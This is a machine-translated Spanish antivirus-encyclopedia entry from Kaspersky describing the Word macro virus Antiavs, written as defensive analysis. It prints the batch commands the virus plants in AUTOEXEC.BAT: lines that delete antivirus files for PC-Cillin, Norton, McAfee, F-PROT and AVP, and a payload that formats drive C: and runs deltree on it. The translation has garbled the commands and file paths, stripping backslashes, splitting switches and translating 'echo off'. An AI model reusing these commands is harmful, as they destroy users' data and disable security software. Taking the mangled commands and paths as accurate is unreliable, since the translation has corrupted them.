ESTE SERVICIO PUEDE CONTENER TRADUCCIONES DE GOOGLE. GOOGLE NIEGA CUALQUIER RESPONSABILIDAD RELACIONADA CON LAS TRADUCCIONES, EXPRESA O IMPLÍCITA, INCLUYENDO CUALQUIER RESPONSABILIDAD ACERCA DE LA PRECISIÓN, LA CONFIABILIDAD Y CUALQUIER RESPONSABILIDAD IMPLÍCITA DE COMERCIABILIDAD, IDONEIDAD PARA UN PROPÓSITO EN PARTICULAR Y DE NO INFRACCIÓN.

Por su comodidad, se ha traducido el sitio web de Kaspersky Lab utilizando un software de traducción de Google Translate. Se hicieron unos esfuerzos razonables para proporcionar una traducción precisa; no obstante, las traducciones automáticas no son perfectas y no hay ninguna intención de sustituir el trabajo de los traductores. Se proporcionan estas traducciones como un servicio para los usuarios del sitio web de Kaspersky Lab y se han publicado tal "como es". No hay ninguna garantía, expresa o implícita, acerca de la precisión, la confiabilidad o exactitud de cualquier traducción desde el inglés a cualquier otro idioma. La traducción de algunos contenidos (imágenes, videos, Flash, etc) podrían no ser totalmente fiel debido a las limitaciones del software de traducción.

Virus.MSWord.Antiavs

Clase Virus
Plataforma MSWord
Descripción

Detalles técnicos

Este es un virus macro de Word encriptado. Contiene nueve macros: AutoExec, AAV, AutoOpen, AutoNew, FileSaveAs, ZlockMacro, FileTemplates, ToolsMacro, Organizer.

El virus infecta el área global de macros al abrir un documento infectado (AutoOpen) y se escribe en documentos que se guardan con un nuevo nombre (FileSaveAs).

Al ingresar al menú Archivo / Plantilla (FileTemplate), el virus establece la contraseña "AntiAVs" para el documento actual y muestra el MessageBox:


WordBasic Err = 16
¡No hay memoria suficiente!
Al ingresar al menú Herramientas / Macro (HerramientasMacro), el virus borra todos los textos dentro del documento actual y agrega al archivo AUTOEXEC.BAT los comandos que borran los archivos de PC-CILLIN antivirus:

echo apagado
attrib -h -r -s + ac: pc-cil ~ 1 *. *> nul
del c: pc-cil ~ 1 * .dll> nul
El virus luego borra los archivos antivirus:

C: PC-Cillin 95Lpt $ vpn. *
C: PC-Cillin 97Lpt $ vpn. *
C: TscPC-Cillin 97Lpt $ vpn. *
C: ZlockavGsav.cas
C: VB7Virus.txt
C: Archivos de programaNorton AntiVirusViruscan.dat
C: Archivos de programaSymantecSymevnt.386
C: Archivos de programaMcAfeeVirusScan95Scan.dat
C: Archivos de programaMcAfeeVirusScan95Mcscan32.dll
C: Archivos de programaMcAfeeVirusScanScan.dat
C: Archivos de programaMcAfeeVirusScanMcscan32.dll
C: Archivos de programaCommand SoftwareF-PROT95Sign.def
C: Archivos de programaCommand SoftwareF-PROT95Dvp.vxd
C: Archivos de programaAntiViral Toolkit ProAvp32.exe
C: Archivos de programaAntiViral Toolkit Pro * .avc
C: Tbavw95Tbavw95.vxd
Según el contador aleatorio del sistema, el virus escribe el texto en el archivo AUTOEXEC.BAT:

@Echo off
cls
echo tengo limpio un gran virus:
echo MS-WINDOWS
echo para ti ^ _ ^
echo –AntiAVs–
echo y | format c: / u / v: AAV> nul
deltree / yc:> nul


Enlace al original